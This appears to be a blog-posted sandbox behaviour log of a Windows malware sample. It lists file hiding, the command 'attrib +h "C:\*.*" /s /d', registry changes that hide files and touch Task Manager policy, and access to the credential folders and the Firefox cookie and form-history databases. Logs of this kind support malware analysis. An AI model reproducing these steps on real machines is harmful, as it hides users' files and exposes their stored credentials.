   e68aedbc5821d17132a5340[1].gif
163293
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\614595f
   ba50d96389708a4135776e4[1].gif
163243
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\617475c
   f39bf6f5c0bd6ecb985335c[1].gif
163248
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\822B7BD
   CBB932A278281E2F651429[1].jpg
163214737
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\927[1].
   png
16323610
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\92B0DB8
   3806125262F3FBC6E76B660[2].jpg
16329164
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\CDAB2F4
   4A1591D2B308C20C6C15375[1].jpg
16327075
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\coUApri
   nt[1].css
16322079
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\df1d7d6
   1446cec7602dc18f98fe3fd[1].css
16324648
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\EB75D45
   B8948F72EE451223E95A96[1].gif
16322477
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\eolas[1
   ].js
1632381
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\reusabl
   e[1].xml
1632686732
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\02208d2
   11b3366ebb915d602e70ebf[1].css
1632129973
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\278E6F6
   2516781EAC1C965D60DC32[1].jpg
16326983
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\4a0253d
   e6eac448d8f2c39c53f8926[2].js
1632554
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\AC980A5
   5DAAAB5589E42E55B24D[1].jpg
16323918
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\anatm[1
   ].js
1632729
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\c57bc2a
   7d38843d7c4aa8028fc9f82[1].gif
16321142
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\coUA[1]
   .css
163211255
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\default
   settings[1].xml
1632426
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\ec22e99
   52c2296e3b17de63cd1bea1f2[1].js
1632155552
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\EC919A7
   328715FC4E5BBFF2A33D5[1].jpg
16326949
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\ec9da23
   8a81ebb4538a1a066dfdaec[1].css
16323573
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\gap[1]
163244
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\jscript
   [1]
163262
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\mat_grl
   _fbsingle_newgirlsgrnsqrrepop_vsgeocity_6ageradio_na_93040_113011_noy_300x120[1].gif
163214962
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\msn[1]
1632104302
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\primedn
   s[1].gif
163243
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\index.dat
163265536
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\AntiPhishing
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp
1632
Folder
Open
C:\Documents and Settings\admin\My Documents
1632
Folder
Open
C:\Documents and Settings\admin\My Documents\My Music
1632
File
Open

Target:      C:\Documents and Settings\admin\My Documents\My Music\Sample Music.lnk
1632638
File
Hide

Target:      C:\Documents and Settings\admin\My Documents\My Music\Sample Music.lnk
1632638
Folder
Open
C:\Documents and Settings\admin\My Documents\My Pictures
1632
File
Open

Target:      C:\Documents and Settings\admin\My Documents\My Pictures\Sample Pictures.lnk
1632668
File
Hide

Target:      C:\Documents and Settings\admin\My Documents\My Pictures\Sample Pictures.lnk
1632668
Folder
Hide
C:\Documents and Settings\admin\My Documents\My Music
1632
Folder
Hide
C:\Documents and Settings\admin\My Documents\My Pictures
1632
File
Hide
C:\Documents and Settings\admin\SendTo\Compressed (zipped) Folder.ZFSendToTarget
1632
File
Hide
C:\Documents and Settings\admin\SendTo\Desktop (create shortcut).DeskLink
1632
File
Hide
C:\Documents and Settings\admin\SendTo\Mail Recipient.MAPIMail
1632
File
Open
C:\Documents and Settings\admin\SendTo\My Documents.mydocs
1632
File
Hide
C:\Documents and Settings\admin\SendTo\My Documents.mydocs
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Accessibility\Magnifier.lnk
16321525
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk
16321532
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk
16321501
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Accessibility\Utility Manager.lnk
16321539
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Entertainment\RealPlayer.lnk
1632725
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Entertainment\Windows Media Player.l
   nk
1632804
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No A
   dd-ons).lnk
1632833
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Accessibility
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Address Book.lnk
1632774
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Command Prompt.lnk
16321555
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Entertainment
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Notepad.lnk
16321519
File
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Program Compatibility Wizard.lnk
1632386
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Synchronize.lnk
16321519
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Accessories\System Tools
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Tour Windows XP.lnk
16321527
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Windows Explorer.lnk
16321487
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Accessories
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Internet Explorer.lnk
1632803
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Outlook Express.lnk
1632738
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Remote Assistance.lnk
16321599
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Startup
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Windows Media Player.lnk
1632792
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs
1632
File
Hide
C:\Documents and Settings\admin\Templates\amipro.sam
16324570
File
Hide
C:\Documents and Settings\admin\Templates\excel.xls
16325632
File
Hide
C:\Documents and Settings\admin\Templates\excel4.xls
16321518
File
Hide
C:\Documents and Settings\admin\Templates\lotus.wk4
16322448
File
Hide
C:\Documents and Settings\admin\Templates\powerpnt.ppt
163212288
File
Hide
C:\Documents and Settings\admin\Templates\presenta.shw
1632461
File
Hide
C:\Documents and Settings\admin\Templates\quattro.wb2
16324017
File
Hide
C:\Documents and Settings\admin\Templates\sndrec.wav
163258
File
Hide
C:\Documents and Settings\admin\Templates\winword.doc
16324608
File
Hide
C:\Documents and Settings\admin\Templates\winword2.doc
16321769
File
Hide
C:\Documents and Settings\admin\Templates\wordpfct.wpd
163230
File
Hide
C:\Documents and Settings\admin\Templates\wordpfct.wpg
163257
Folder
Hide
C:\Documents and Settings\admin\Desktop
1632
Folder
Hide
C:\Documents and Settings\admin\Favorites
1632
Folder
Hide
C:\Documents and Settings\admin\My Documents
1632
Folder
Hide
C:\Documents and Settings\admin\Start Menu
1632
Mutex
  Imagepath:  C:\WINDOWS\system32\attrib.exe
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools
352
Process
Terminated
C:\WINDOWS\system32\attrib.exe
  Parentname:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Command Line:  N/A
16321436
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\AutoItX
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office\Microsoft Office Tools
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Real\RealPlayer
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Accessories
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Debugging Tools for Windows (x86)
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Games
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Mozilla Firefox
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\QuickTime
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Real
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs
352
Process
Terminated
C:\WINDOWS\system32\attrib.exe
  Parentname:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Command Line:  N/A
3521436
Process
Started
C:\WINDOWS\system32\attrib.exe
  Parentname:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Command Line:  attrib +h "C:\*.*" /s /d
4601436
Mutex
  Imagepath:  C:\WINDOWS\system32\attrib.exe
460
File
Hide
C:\bin\a.dll
460917504
Malicious  Alert
Misc  Anomaly
Message:   System file hiding observed    Detail:   Malware hiding newly created exe/dll/sys file   
File
Hide
C:\bin\apimon-1108.log
  MD5:  c5bcb19feb4f03328bb8c398ee7ff6d4
  SHA1: ab16894a282d66036858375a528eadcc82a569ae
4603994
File
Hide
C:\bin\apimon-1208.log
  MD5:  7445b16a2ecc494347c20e90333dcceb
  SHA1: fa3b1062076e3488e2dd5597b80d04ee5238dc5a
46068866
File
Hide
C:\bin\apimon-1228.log
  MD5:  7fc14e5aa031e1ff06d169a787f4ca3f
  SHA1: 05d086b634bf70eb401a8a8402568d130ad67b4f
46068755
File
Hide
C:\bin\apimon-1436.log
4603754
File
Hide
C:\bin\apimon-1564.log
46070029
File
Hide
C:\bin\apimon-1632.log
  MD5:  d98c0c916b5182230baf75ef1b8d2551
  SHA1: ed2defd0af03f397ab21dac885b0e09dffbf6105
46068755
File
Hide
C:\bin\apimon-1652.log
46069036
File
Hide
C:\bin\apimon-2004.log
  MD5:  5fc0df0f15abae51ed0298f5b3480900
  SHA1: d164de41ac5189448d4f1ff99ebdccc41008bcb3
46055120
File
Hide
C:\bin\apimon-2044.log
  MD5:  6a077a0f14afcef5fd39d3021b284c58
  SHA1: 01d57b2f743025716c69610d7959c42a7636b861
46055009
File
Hide
C:\bin\apimon-352.log
  MD5:  da0e7324b0b5b6cda625813242b7e71a
  SHA1: f6165ccce3cd24f0c0a4cc770e0cab3069869840
46068755
File
Hide
C:\bin\apimon-460.log
46068461
File
Hide
C:\bin\apimon-660.log
46069144
File
Hide
C:\bin\apimon-756.log
  MD5:  97178179d6552ae7731e7a75fded231d
  SHA1: 8ed70289449c0a79e2dfe9e02d0abc1376312f76
46069438
File
Hide
C:\bin\apimon_logging.conf
4601795
File
Hide
C:\bin\autolaunch.au3
4606971
File
Hide
C:\bin\autorun.bat
46017
File
Hide
C:\bin\autorun.inf
46033
File
Hide
C:\bin\configure.js
4605853
File
Hide
C:\bin\confutil.exe
46019968
File
Hide
C:\bin\crash-config.xml
4604097
File
Hide
C:\bin\crashdetection.cfg
46018643
File
Hide
C:\bin\custom.au3
460748
File
Hide
C:\bin\devcon.exe
46055808
File
Hide
C:\bin\dh.dll
4601080656
File
Hide
C:\bin\dlltester_logging.conf
4601387
File
Hide
C:\bin\dynamic-ip.cmd
460128
File
Hide
C:\bin\el.log
4603149
File
Hide
C:\bin\el_logging.conf
4603082
File
Hide
C:\bin\eventlog-winxp.exe
4601032192
File
Hide
C:\bin\firemon.sys
46086784
File
Hide
C:\bin\gi_autoinit.bat
4601169
File
Hide
C:\bin\netmon-1108.log
  MD5:  df041d8f5bbb14028bad22baa53a7050
  SHA1: 1973955ba0fc5c9f3f2883d65388e9b03ec93878
460120
File
Hide
C:\bin\netmon-1564.log
460120
File
Hide
C:\bin\netmon-2044.log
  MD5:  f2ffc4e3ab37a9fd16072c882a1754ab
  SHA1: a19e48bba17ee3fa383c8f573f37a6afc9cbbd45
460120
File
Hide
C:\bin\netmon-660.log
460120
File
Hide
C:\bin\netmon.dll
460753664
File
Hide
C:\bin\netmon_logging.conf
4601391
File
Hide
C:\bin\office.bat
4602
Folder
Hide
C:\bin\old-log
460
File
Hide
C:\bin\plistcom.exe
46077824
File
Hide
C:\bin\sleep.exe
46023040
File
Hide
C:\bin\sysmsg.dll
4607168
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\System\"DisableTaskMgr" = 0x00000000
1436
Malicious  Alert
Misc  Anomaly
Message:   6+ startup registry key sets    Detail:   Malware setting 6+ startup registry keys   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"DisableTaskMgr" = 0x000
   00000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Hidden" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"ShowSuperHidden" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\ActiveDesktop\"HidNoChangingWallPaperden" = 0x00000001
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\"EnableAutoTray" = 0x00000000
1436
Folder
Open
C:\Documents and Settings\admin\Application Data\Microsoft\Credentials
460
Folder
Open
C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844
   -725345543-1003
460
File
Open
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\cookies.s
   qlite
4602048
File
Open
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\formhisto
   ry.sqlite
4604096
Folder
Open
C:\Documents and Settings\admin\Cookies
460
File
Open
C:\Documents and Settings\admin\Cookies\admin@ad.wsod[2].txt
460176
File
Open
C:\Documents and Settings\admin\Cookies\admin@atdmt[2].txt
460180
File
Open
C:\Documents and Settings\admin\Cookies\admin@bing[2].txt
460192
File
Open
C:\Documents and Settings\admin\Cookies\admin@c.atdmt[2].txt
460198
File
Open
C:\Documents and Settings\admin\Cookies\admin@c.msn[1].txt
46067
File
Open
C:\Documents and Settings\admin\Cookies\admin@match[2].txt
460174
File
Open
C:\Documents and Settings\admin\Cookies\admin@microsoft[1].txt
460108
File
Open
C:\Documents and Settings\admin\Cookies\admin@msn[1].txt
460584
File
Open
C:\Documents and Settings\admin\Cookies\admin@scorecardresearch[2].txt
460195
File
Open
C:\Documents and Settings\admin\Cookies\admin@www.bing[1].txt
460111
File
Open
C:\Documents and Settings\admin\Cookies\admin@www.msn[2].txt
460230
File
Open
C:\Documents and Settings\admin\Cookies\index.dat
46032768
Folder
Open
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Credentials
460
Folder
Open
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-14090
   82233-688789844-725345543-1003
460
File
Delete
C:\Documents and Settings\admin\Recent\Desktop.ini
1436150
Folder
Delete
C:\Documents and Settings\admin\Recent
1436
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\RecentDocs
1436
Folder
Created
C:\Documents and Settings\admin\Recent
1436
Folder
Hide
C:\Documents and Settings\admin\Recent
1436
File
Created
C:\Documents and Settings\admin\Recent\Desktop.ini
1436
File
Close
C:\Documents and Settings\admin\Recent\Desktop.ini
  MD5:  0cf1a1d4f128bc07491b37335dec6b62
  SHA1: 239f28dc142ee322133f4dc238060ed7c962e4eb
143648
File
Open
C:\Documents and Settings\admin\Recent\Desktop.ini
  MD5:  0cf1a1d4f128bc07491b37335dec6b62
  SHA1: 239f28dc142ee322133f4dc238060ed7c962e4eb
143648
File
Close
C:\Documents and Settings\admin\Recent\Desktop.ini
  MD5:  9f26352708c846c5e999a41462adbd91
  SHA1: dd2051f5eb70837d607e0203f01722f33f350b01
143692
File
Close
C:\Documents and Settings\admin\Recent\Desktop.ini
  MD5:  39533c1b57a057448960e9a132252bc3
  SHA1: cf664abe03c652193b421f84e4028068cdb3b6eb
1436107
File
Hide
C:\Documents and Settings\admin\Recent\Desktop.ini
  MD5:  39533c1b57a057448960e9a132252bc3
  SHA1: cf664abe03c652193b421f84e4028068cdb3b6eb
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)